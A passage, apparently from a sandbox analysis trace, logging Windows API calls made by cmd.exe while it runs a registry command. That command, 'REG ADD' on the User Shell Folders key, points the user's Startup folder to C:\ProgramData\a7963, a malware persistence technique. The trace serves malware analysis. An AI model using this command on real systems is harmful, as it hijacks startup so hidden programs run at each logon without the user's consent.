(penv="=") returned 1 [0121.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30fea74 | out: phkResult=0x30fea74*=0xcc) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x0, lpData=0x30fea80*=0x90, lpcbData=0x30fea78*=0x1000) returned 0x2 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x4, lpData=0x30fea80*=0x1, lpcbData=0x30fea78*=0x4) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x0, lpData=0x30fea80*=0x1, lpcbData=0x30fea78*=0x1000) returned 0x2 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x4, lpData=0x30fea80*=0x0, lpcbData=0x30fea78*=0x4) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x4, lpData=0x30fea80*=0x40, lpcbData=0x30fea78*=0x4) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x4, lpData=0x30fea80*=0x40, lpcbData=0x30fea78*=0x4) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x0, lpData=0x30fea80*=0x40, lpcbData=0x30fea78*=0x1000) returned 0x2 [0121.658] RegCloseKey (hKey=0xcc) returned 0x0 [0121.658] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30fea74 | out: phkResult=0x30fea74*=0xcc) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x0, lpData=0x30fea80*=0x40, lpcbData=0x30fea78*=0x1000) returned 0x2 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x4, lpData=0x30fea80*=0x1, lpcbData=0x30fea78*=0x4) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x0, lpData=0x30fea80*=0x1, lpcbData=0x30fea78*=0x1000) returned 0x2 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x4, lpData=0x30fea80*=0x0, lpcbData=0x30fea78*=0x4) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x4, lpData=0x30fea80*=0x9, lpcbData=0x30fea78*=0x4) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x4, lpData=0x30fea80*=0x9, lpcbData=0x30fea78*=0x4) returned 0x0 [0121.658] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30fea7c, lpData=0x30fea80, lpcbData=0x30fea78*=0x1000 | out: lpType=0x30fea7c*=0x0, lpData=0x30fea80*=0x9, lpcbData=0x30fea78*=0x1000) returned 0x2 [0121.658] RegCloseKey (hKey=0xcc) returned 0x0 [0121.658] time (in: timer=0x0 | out: timer=0x0) returned 0x5fe44546 [0121.659] srand (_Seed=0x5fe44546) [0121.659] GetCommandLineW () returned="cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963" [0121.659] malloc (_Size=0x4000) returned 0x37223c8 [0121.659] GetCommandLineW () returned="cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963" [0121.659] malloc (_Size=0xffce) returned 0x3560048 [0121.660] ??_V@YAXPAX@Z () returned 0x30ffa58 [0121.660] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3560048 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0121.661] malloc (_Size=0xffce) returned 0x3570020 [0121.662] ??_V@YAXPAX@Z () returned 0x30ff82c [0121.662] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3570020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0121.662] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x98f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xea [0121.662] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x98f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0121.662] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x98f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0121.662] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0121.662] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0121.662] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0121.662] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0121.662] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0121.662] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0121.662] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0121.663] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0121.663] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0121.663] GetProcessHeap () returned 0x3360000 [0121.663] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3365be0) returned 1 [0121.663] GetEnvironmentStringsW () returned 0x3368058* [0121.663] GetProcessHeap () returned 0x3360000 [0121.663] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xc2a) returned 0x3364fc0 [0121.663] FreeEnvironmentStringsA (penv="=") returned 1 [0121.663] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x98f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0121.663] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x98f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0121.663] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0121.663] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0121.663] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0121.663] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0121.663] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0121.663] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0121.663] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0121.663] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0121.663] malloc (_Size=0xffce) returned 0x357fff8 [0121.664] ??_V@YAXPAX@Z () returned 0x30ff5c4 [0121.664] GetProcessHeap () returned 0x3360000 [0121.664] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x3c) returned 0x3364e70 [0121.664] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x357fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0121.664] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x7fe7, lpBuffer=0x357fff8, lpFilePart=0x30ff610 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x30ff610*="Documents") returned 0x19 [0121.664] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0121.665] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30ff390 | out: lpFindFileData=0x30ff390*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3365bf8 [0121.665] FindClose (in: hFindFile=0x3365bf8 | out: hFindFile=0x3365bf8) returned 1 [0121.665] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x30ff390 | out: lpFindFileData=0x30ff390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x3365bf8 [0121.665] FindClose (in: hFindFile=0x3365bf8 | out: hFindFile=0x3365bf8) returned 1 [0121.665] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0x30ff390 | out: lpFindFileData=0x30ff390*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x48d49e83, ftLastAccessTime.dwHighDateTime=0x1d5e879, ftLastWriteTime.dwLowDateTime=0x48d49e83, ftLastWriteTime.dwHighDateTime=0x1d5e879, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x3365bf8 [0121.665] FindClose (in: hFindFile=0x3365bf8 | out: hFindFile=0x3365bf8) returned 1 [0121.665] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0121.665] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0121.665] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Documents" (normalized: "c:\\users\\fd1hvy\\documents")) returned 1 [0121.665] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Documents") returned 1 [0121.665] GetProcessHeap () returned 0x3360000 [0121.666] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3364fc0) returned 1 [0121.666] GetEnvironmentStringsW () returned 0x3364fc0* [0121.666] GetProcessHeap () returned 0x3360000 [0121.666] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xc66) returned 0x3368cc8 [0121.666] FreeEnvironmentStringsA (penv="=") returned 1 [0121.666] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3560048 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0121.666] GetProcessHeap () returned 0x3360000 [0121.666] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3364e70) returned 1 [0121.666] ??_V@YAXPAX@Z () returned 0x1 [0121.666] ??_V@YAXPAX@Z () returned 0x1 [0121.666] GetProcessHeap () returned 0x3360000 [0121.666] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x400e) returned 0x3369938 [0121.666] GetProcessHeap () returned 0x3360000 [0121.666] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x116) returned 0x3360ae0 [0121.666] GetProcessHeap () returned 0x3360000 [0121.666] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3369938) returned 1 [0121.666] GetConsoleOutputCP () returned 0x1b5 [0121.667] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x993850 | out: lpCPInfo=0x993850) returned 1 [0121.667] GetUserDefaultLCID () returned 0x412 [0121.668] GetLocaleInfoW (in: Locale=0x412, LCType=0x1e, lpLCData=0x98f82c, cchData=8 | out: lpLCData=":") returned 2 [0121.668] GetLocaleInfoW (in: Locale=0x412, LCType=0x23, lpLCData=0x30ff980, cchData=128 | out: lpLCData="0") returned 2 [0121.668] GetLocaleInfoW (in: Locale=0x412, LCType=0x21, lpLCData=0x30ff980, cchData=128 | out: lpLCData="2") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x24, lpLCData=0x30ff980, cchData=128 | out: lpLCData="1") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x1d, lpLCData=0x98f81c, cchData=8 | out: lpLCData="-") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x31, lpLCData=0x98f7b8, cchData=32 | out: lpLCData="월") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x32, lpLCData=0x98f778, cchData=32 | out: lpLCData="화") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x33, lpLCData=0x98f738, cchData=32 | out: lpLCData="수") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x34, lpLCData=0x98f6f8, cchData=32 | out: lpLCData="목") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x35, lpLCData=0x98f6b8, cchData=32 | out: lpLCData="금") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x36, lpLCData=0x98f678, cchData=32 | out: lpLCData="토") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0x37, lpLCData=0x98f638, cchData=32 | out: lpLCData="일") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0xe, lpLCData=0x98f80c, cchData=8 | out: lpLCData=".") returned 2 [0121.670] GetLocaleInfoW (in: Locale=0x412, LCType=0xf, lpLCData=0x98f7f8, cchData=8 | out: lpLCData=",") returned 2 [0121.670] setlocale (category=0, locale=".OCP") returned="Korean_Korea.949" [0121.673] GetProcessHeap () returned 0x3360000 [0121.673] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x0, Size=0x20c) returned 0x3360f98 [0121.673] GetConsoleTitleW (in: lpConsoleTitle=0x3360f98, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0121.674] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b20000 [0121.674] GetProcAddress (hModule=0x75b20000, lpProcName="CopyFileExW") returned 0x75b34330 [0121.674] GetProcAddress (hModule=0x75b20000, lpProcName="IsDebuggerPresent") returned 0x75b35930 [0121.674] GetProcAddress (hModule=0x75b20000, lpProcName="SetConsoleInputExeNameW") returned 0x77aa09d0 [0121.674] ??_V@YAXPAX@Z () returned 0x1 [0121.675] GetProcessHeap () returned 0x3360000 [0121.675] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x400a) returned 0x3369938 [0121.675] GetProcessHeap () returned 0x3360000 [0121.675] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3369938) returned 1 [0121.675] _wcsicmp (_String1="REG", _String2=")") returned 73 [0121.675] _wcsicmp (_String1="FOR", _String2="REG") returned -12 [0121.675] _wcsicmp (_String1="FOR/?", _String2="REG") returned -12 [0121.675] _wcsicmp (_String1="IF", _String2="REG") returned -9 [0121.675] _wcsicmp (_String1="IF/?", _String2="REG") returned -9 [0121.675] _wcsicmp (_String1="REM", _String2="REG") returned 6 [0121.675] _wcsicmp (_String1="REM/?", _String2="REG") returned 6 [0121.675] GetProcessHeap () returned 0x3360000 [0121.675] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x58) returned 0x33611b0 [0121.675] GetProcessHeap () returned 0x3360000 [0121.675] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x10) returned 0x3361210 [0121.678] GetProcessHeap () returned 0x3360000 [0121.678] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x10c) returned 0x3361228 [0121.678] GetConsoleTitleW (in: lpConsoleTitle=0x30ff878, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0121.679] malloc (_Size=0xffce) returned 0x3572348 [0121.679] ??_V@YAXPAX@Z () returned 0x30ff604 [0121.679] malloc (_Size=0xffce) returned 0x3582320 [0121.680] ??_V@YAXPAX@Z () returned 0x30ff3bc [0121.680] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0121.680] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0121.680] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0121.680] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0121.680] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0121.680] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0121.680] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0121.681] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0121.681] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0121.681] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0121.681] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0121.681] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0121.681] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0121.681] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0121.681] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0121.681] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0121.681] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0121.681] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0121.681] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0121.681] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0121.681] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0121.681] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0121.681] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0121.681] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0121.681] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0121.681] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0121.681] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0121.681] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0121.681] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0121.681] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0121.681] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0121.681] _wcsicmp (_String1="REG", _String2="START") returned -1 [0121.681] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0121.681] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0121.681] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0121.681] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0121.681] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0121.681] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0121.681] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0121.681] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0121.681] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0121.681] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0121.681] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0121.681] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0121.681] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0121.681] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0121.682] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0121.682] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0121.682] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0121.682] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0121.682] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0121.682] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0121.682] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0121.682] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0121.682] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0121.682] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0121.682] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0121.682] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0121.682] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0121.682] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0121.682] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0121.682] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0121.682] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0121.682] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0121.682] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0121.682] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0121.682] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0121.682] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0121.682] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0121.682] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0121.682] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0121.682] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0121.682] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0121.682] _wcsicmp (_String1="REG", _String2="START") returned -1 [0121.682] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0121.682] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0121.682] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0121.682] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0121.682] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0121.682] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0121.682] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0121.682] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0121.682] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0121.682] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0121.683] _wcsicmp (_String1="REG", _String2="FOR") returned 12 [0121.683] _wcsicmp (_String1="REG", _String2="IF") returned 9 [0121.683] _wcsicmp (_String1="REG", _String2="REM") returned -6 [0121.683] ??_V@YAXPAX@Z () returned 0x1 [0121.683] GetProcessHeap () returned 0x3360000 [0121.683] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xffd6) returned 0x3369938 [0121.684] GetProcessHeap () returned 0x3360000 [0121.684] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x114) returned 0x3361340 [0121.684] _wcsnicmp (_String1="REG", _String2="cmd ", _MaxCount=0x4) returned 15 [0121.684] malloc (_Size=0xffce) returned 0x3582320 [0121.684] ??_V@YAXPAX@Z () returned 0x30ff13c [0121.684] GetProcessHeap () returned 0x3360000 [0121.684] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x1ffa4) returned 0x3379918 [0121.686] SetErrorMode (uMode=0x0) returned 0x8001 [0121.686] SetErrorMode (uMode=0x1) returned 0x0 [0121.686] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x3379920, lpFilePart=0x30ff15c | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x30ff15c*="Documents") returned 0x19 [0121.687] SetErrorMode (uMode=0x8001) returned 0x1 [0121.687] GetProcessHeap () returned 0x3360000 [0121.687] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x3379918, Size=0x44) returned 0x3379918 [0121.687] GetProcessHeap () returned 0x3360000 [0121.687] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x3379918) returned 0x44 [0121.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x98f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xea [0121.688] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0121.688] GetProcessHeap () returned 0x3360000 [0121.688] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x216) returned 0x3361460 [0121.689] GetProcessHeap () returned 0x3360000 [0121.689] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x420) returned 0x3367420 [0121.699] GetProcessHeap () returned 0x3360000 [0121.699] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x3367420, Size=0x216) returned 0x3367420 [0121.699] GetProcessHeap () returned 0x3360000 [0121.699] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x3367420) returned 0x216 [0121.699] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x98f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0121.699] GetProcessHeap () returned 0x3360000 [0121.699] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xe0) returned 0x3367640 [0121.699] GetProcessHeap () returned 0x3360000 [0121.699] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x3367640, Size=0x76) returned 0x3367640 [0121.699] GetProcessHeap () returned 0x3360000 [0121.699] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x3367640) returned 0x76 [0121.699] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.699] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x30feee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30feee8) returned 0xffffffff [0121.699] GetLastError () returned 0x2 [0121.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.700] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x30feee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30feee8) returned 0xffffffff [0121.702] GetLastError () returned 0x2 [0121.702] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0121.702] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x30feee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30feee8) returned 0x3361680 [0121.703] GetProcessHeap () returned 0x3360000 [0121.703] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x0, Size=0x14) returned 0x33616c0 [0121.703] FindClose (in: hFindFile=0x3361680 | out: hFindFile=0x3361680) returned 1 [0121.703] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\reg.COM", fInfoLevelId=0x1, 